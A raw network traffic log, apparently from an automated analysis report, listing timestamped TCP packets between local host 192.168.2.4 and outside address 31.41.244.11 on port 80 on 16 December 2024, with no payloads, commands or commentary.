                                                                                                                                                                                              Dec 16, 2024 01:01:27.754997015 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.755023003 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.755072117 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.755794048 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.755842924 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.755856037 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.755898952 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.849694967 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.849741936 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.849747896 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.849781036 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.850049973 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.850096941 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.850101948 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.850157022 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.850222111 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.850332022 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.850972891 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.851018906 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.851100922 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.851146936 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.851764917 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.851897955 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.907104015 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.907174110 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.907196999 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.907265902 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.907655001 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.907681942 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.907704115 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.907716990 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.908291101 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.908415079 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.908463955 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.909115076 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.909163952 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.909357071 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.909415960 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.909486055 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.909529924 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.910234928 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.910288095 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.910342932 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.910397053 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.911077976 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.911123037 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.911169052 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.911212921 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.911905050 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.911950111 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.912048101 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.912091970 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.912754059 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.912801981 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.912879944 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.912916899 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.913590908 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.913634062 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.913703918 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.913856983 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.914427042 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.914491892 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.914545059 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.914630890 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.915241003 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.915292978 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.915350914 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.915390015 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.916104078 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.916215897 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.916227102 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.916250944 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.916944981 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.916990042 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.917042971 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.917150021 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.917838097 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.917926073 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.917964935 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.918062925 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.918626070 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.918667078 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.918740988 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.918802977 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.919461966 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.919507980 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.919553041 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.919591904 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.920319080 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.920418978 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.920423031 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.920459032 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.921149015 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.921191931 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.921237946 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.921286106 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.921974897 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.922019005 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.922080040 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.922117949 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.922813892 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.922935009 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.922939062 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.922971964 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.923664093 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.923706055 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.923787117 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.923831940 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.924503088 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.924546003 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.924598932 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.924765110 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.925335884 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.925446033 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.925487041 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.926160097 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.926217079 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.926256895 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.926301003 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.927023888 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.927067041 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.927120924 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.927162886 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.927865982 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.927912951 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.928005934 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.928137064 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.928684950 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.928797960 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.928808928 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.928838015 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.929574966 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.929620028 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.929718971 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.929780960 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.930402994 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.930452108 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.930505991 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.930545092 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.931212902 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.931252003 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.931339025 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.931440115 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.932082891 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.932123899 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.932208061 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.932276964 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.932945013 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.933079958 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.933111906 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.933129072 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.933747053 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.933785915 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.933922052 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.933975935 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.934607983 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.934652090 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.934691906 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.934727907 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.935477018 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.935528040 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.935597897 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.935750961 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.936252117 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.936336040 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.936342955 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.936381102 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.937094927 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.937148094 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.937196970 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.937244892 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.937925100 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.938000917 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.938081980 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.938179970 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.938764095 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.938827991 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.938874960 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.938993931 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.939610004 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.939729929 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.939774036 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.940459013 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.940510035 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.940557957 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.940601110 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.941277027 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.941324949 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.941400051 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.941523075 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.942126989 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.942231894 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.942282915 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.942960978 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.943013906 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.943059921 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.943101883 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.943818092 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.943924904 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.943970919 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.944657087 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.944709063 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.944747925 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.944864988 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.945504904 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.945553064 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.945599079 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.945643902 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.946340084 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.946388960 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.946477890 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.946532011 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.947199106 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.947253942 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.947285891 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.947401047 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.948055983 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.948298931 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.041876078 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.041903973 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.041930914 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.041949987 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.042167902 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.042213917 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.042251110 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.042294025 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.043083906 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.043132067 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.043153048 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.043183088 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.043776035 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.043824911 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.099385023 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.099411011 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.099447012 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.099462986 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.099836111 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.099859953 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.099890947 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.099905968 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.100411892 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.100441933 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.100452900 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.100476027 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.101176977 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.101227999 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.101608992 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.101627111 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.101648092 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.101663113 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.102340937 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.102442026 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.102463007 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.102478027 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.103161097 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.103203058 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.103300095 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.103353024 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.103991032 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.104084969 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.104125023 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.104162931 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.104842901 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.104895115 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.104940891 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.104983091 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.105676889 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.105791092 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.105820894 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.105837107 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.106509924 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.106585026 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.106611967 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.106654882 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.107341051 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.107383013 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.107433081 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.107475042 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.108161926 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.108208895 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.108249903 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.108294964 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.109051943 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.109096050 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.109137058 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.109222889 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.109874964 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.109915018 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.109992027 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.110127926 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.110704899 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.110768080 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.110799074 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.110837936 CET4980080192.168.2.431.41.244.11
